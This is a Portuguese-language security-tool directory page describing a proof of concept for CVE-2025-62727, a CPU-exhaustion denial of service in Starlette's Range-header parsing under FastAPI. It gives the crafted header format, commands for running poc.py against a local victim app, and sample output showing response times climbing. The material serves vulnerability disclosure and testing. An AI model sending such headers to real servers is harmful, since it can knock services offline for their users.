Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-62727-Demo — Prova de conceito do CVE-2025-62727 que pode causar negação de serviço no FastAPI (baseado em Starlette <= 0.48.0) | Kitploit
Ferramentas/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
Análise de VulnerabilidadesExploraçãoSegurança WebSegurança de API
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

Prova de conceito do CVE-2025-62727 que pode causar negação de serviço no FastAPI (baseado em Starlette <= 0.48.0)

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Demonstração do CVE-2025-62727

Descrição da Vítima

A vítima alvo do CVE-2025-62727 é um aplicativo FastAPI simples que:

  • Serve Hello World em /.
  • Serve arquivos estáticos em /static usando o StaticFiles do Starlette.
  • Gera automaticamente arquivos de texto contendo A repetido N vezes para N em 1024, 2048, 50176 na inicialização.

Como executar a vítima

  1. (Opcional) Crie e ative um virtualenv.

  2. Instale as dependências:

    root@kitploit:~
    pip install -r requirements.txt
    
  • Inicie o servidor:

    root@kitploit:~
    uvicorn main:app --reload
    
  • Abra:

    • http://127.0.0.1:8000/ para a página inicial.
    • http://127.0.0.1:8000/static/1024.txt etc. para arquivos estáticos.

    Notas

    • Os arquivos estáticos são gerados no diretório static/ na inicialização do aplicativo. Arquivos existentes não são sobrescritos.
    • O serviço estático usa o StaticFiles do Starlette, conforme solicitado.

    PoC: CVE-2025-62727 (Análise do cabeçalho Range)

    O poc.py incluído aciona a análise de Range com alto consumo de CPU no FileResponse do Starlette por meio da rota /static usando um cabeçalho malicioso no formato bytes=000...000a-.

    Execute o servidor e, em outro terminal:

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    Sobrescreva a URL alvo (opcional):

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    Notas:

    • O PoC tem como alvo http://127.0.0.1:8000/static/50176.txt por padrão (um arquivo que o aplicativo gera). Use --url para alterá-lo.
    • Ajuste --sizes para baixo se você vir 400/431 (cabeçalho muito grande), ou para cima se os cabeçalhos forem bem-sucedidos e você quiser um efeito mais forte.

    Exemplo de Resultado:

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    Baixar ferramenta